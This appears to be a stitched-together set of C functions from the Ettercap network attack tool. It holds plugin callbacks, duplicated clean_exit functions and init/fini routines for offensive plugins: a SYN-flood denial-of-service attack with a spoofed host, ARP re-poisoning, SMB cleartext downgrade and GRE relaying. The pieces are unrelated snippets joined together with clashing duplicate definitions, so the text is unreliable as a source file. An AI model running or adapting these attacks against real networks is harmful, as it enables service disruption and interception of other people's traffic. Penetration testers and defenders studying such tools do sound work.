/*
* callback function for a plugin
*/
static void curses_select_plugin(void *plugin)
{
/* prevent the selection when the list is empty */
if (plugin == NULL)
return;
/* print the message */
if (plugin_is_activated(plugin) == 0)
INSTANT_USER_MSG("Activating %s plugin...\n", plugin);
else
INSTANT_USER_MSG("Deactivating %s plugin...\n", plugin);
/*
* pay attention on this !
* if the plugin init does not return,
* we are blocked here. So it is encouraged
* to write plugins which spawn a thread
* and immediately return
*/
if (plugin_is_activated(plugin) == 1)
plugin_fini(plugin);
else
plugin_init(plugin);
/* refres the array for the list widget */
curses_plugins_update();
}
static int gre_relay_init(void *dummy)
{
char tmp[MAX_ASCII_ADDR_LEN];
/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("gre_relay: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}
/* don't display messages while operating */
GBL_OPTIONS->quiet = 1;
memset(tmp, 0, sizeof(tmp));
ui_input("Unused IP address: ", tmp, sizeof(tmp), NULL);
if (!inet_aton(tmp, &fake_ip)) {
INSTANT_USER_MSG("gre_relay: Bad IP address\n");
return PLUGIN_FINISHED;
}
USER_MSG("gre_relay: plugin running...\n");
hook_add(HOOK_PACKET_GRE, &parse_gre);
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);
return PLUGIN_RUNNING;
}
static int dos_attack_init(void *dummy)
{
char dos_addr[MAX_ASCII_ADDR_LEN];
char unused_addr[MAX_ASCII_ADDR_LEN];
struct port_list *p;
/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}
/* don't show packets while operating */
GBL_OPTIONS->quiet = 1;
memset(dos_addr, 0, sizeof(dos_addr));
memset(unused_addr, 0, sizeof(dos_addr));
ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
if (ip_addr_pton(dos_addr, &victim_host) == -EINVALID) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
if (ip_addr_pton(unused_addr, &fake_host) == -EINVALID) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
if(victim_host.addr_type != fake_host.addr_type) {
INSTANT_USER_MSG("dos_attack: Address' families don't match.\n");
return PLUGIN_FINISHED;
}
INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);
/* Delete the "open" port list just in case of previous executions */
while (!SLIST_EMPTY(&port_table)) {
p = SLIST_FIRST(&port_table);
SLIST_REMOVE_HEAD(&port_table, next);
SAFE_FREE(p);
}
/* Add the hook to "create" the fake host */
if(ntohs(fake_host.addr_type) == AF_INET)
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);
#ifdef WITH_IPV6
else if(ntohs(fake_host.addr_type) == AF_INET6)
hook_add(HOOK_PACKET_ICMP6_NSOL, &parse_icmp6);
#endif
/* Add the hook for SYN-ACK reply */
hook_add(HOOK_PACKET_TCP, &parse_tcp);
/* create the flooding thread */
ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);
return PLUGIN_RUNNING;
}
void clean_exit(int errcode)
{
DEBUG_MSG("clean_exit: %d", errcode);
INSTANT_USER_MSG("\nTerminating %s...\n", GBL_PROGRAM);
#ifdef HAVE_EC_LUA
/* Cleanup lua */
ec_lua_fini();
#endif
/* flush the exit message */
ui_msg_flush(MSG_ALL);
/* stop the mitm attack */
mitm_stop();
/* terminate the sniffing engine */
EXECUTE(GBL_SNIFF->cleanup);
/* kill all the running threads but the current */
ec_thread_kill_all();
/* close the UI */
ui_cleanup();
/* call all the ATEXIT functions */
exit(errcode);
}
/*
* Populate the open port list and reply to
* SYN-ACK packets from victim host
*/
static void parse_tcp(struct packet_object *po)
{
struct port_list *p;
/* Check if it's a reply to our SYN flooding */
if (ip_addr_cmp(&fake_host, &po->L3.dst) ||
ip_addr_cmp(&victim_host, &po->L3.src) ||
po->L4.flags != (TH_SYN | TH_ACK))
return;
/* Complete the handshake with an ACK */
send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK, NULL, 0);
/* Check if the port is already in the "open" list... */
SLIST_FOREACH(p, &port_table, next)
if (p->port == po->L4.src)
return;
/* If not...put it in */
SAFE_CALLOC(p, 1, sizeof(struct port_list));
p->port = po->L4.src;
SLIST_INSERT_HEAD(&port_table, p, next);
INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port));
}
static int smb_clear_init(void *dummy)
{
/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("smb_clear: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}
USER_MSG("smb_clear: plugin running...\n");
hook_add(HOOK_PROTO_SMB, &parse_smb);
return PLUGIN_RUNNING;
}
/*
* callback function for a plugin
*/
static void gtkui_select_plugin(void)
{
GtkTreeIter iter;
GtkTreeModel *model;
char *plugin = NULL;
model = GTK_TREE_MODEL (ls_plugins);
if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) {
gtk_tree_model_get (model, &iter, 1, &plugin, -1);
} else
return; /* nothing is selected */
if(!plugin)
return; /* bad pointer from gtk_tree_model_get, shouldn't happen */
/* print the message */
if (plugin_is_activated(plugin) == 0)
INSTANT_USER_MSG("Activating %s plugin...\n", plugin);
else
INSTANT_USER_MSG("Deactivating %s plugin...\n", plugin);
/*
* pay attention on this !
* if the plugin init does not return,
* we are blocked here. So it is encouraged
* to write plugins which spawn a thread
* and immediately return
*/
if (plugin_is_activated(plugin) == 1)
plugin_fini(plugin);
else
plugin_init(plugin);
/* refresh the list to mark plugin active */
gtkui_create_plug_array();
}
void clean_exit(int errcode)
{
DEBUG_MSG("clean_exit: %d", errcode);
INSTANT_USER_MSG("\nTerminating %s...\n", GBL_PROGRAM);
/* kill all the running threads but the current */
ec_thread_kill_all();
/* close the UI */
ui_cleanup();
/* call all the ATEXIT functions */
exit(errcode);
}
static int repoison_arp_init(void *dummy)
{
/* variable not used */
(void) dummy;
/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("repoison_arp: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}
hook_add(HOOK_PACKET_ARP_RQ, &repoison_func);
hook_add(HOOK_PACKET_ARP_RP, &repoison_func);
return PLUGIN_RUNNING;
}
static int dos_attack_fini(void *dummy)
{
pthread_t pid;
/* Remove the hooks */
hook_del(HOOK_PACKET_ARP_RQ, &parse_arp);
hook_del(HOOK_PACKET_TCP, &parse_tcp);
pid = ec_thread_getpid("golem");
/* the thread is active or not ? */
if (!pthread_equal(pid, EC_PTHREAD_NULL))
ec_thread_destroy(pid);
INSTANT_USER_MSG("dos_attack: plugin terminated...\n");
return PLUGIN_FINISHED;
}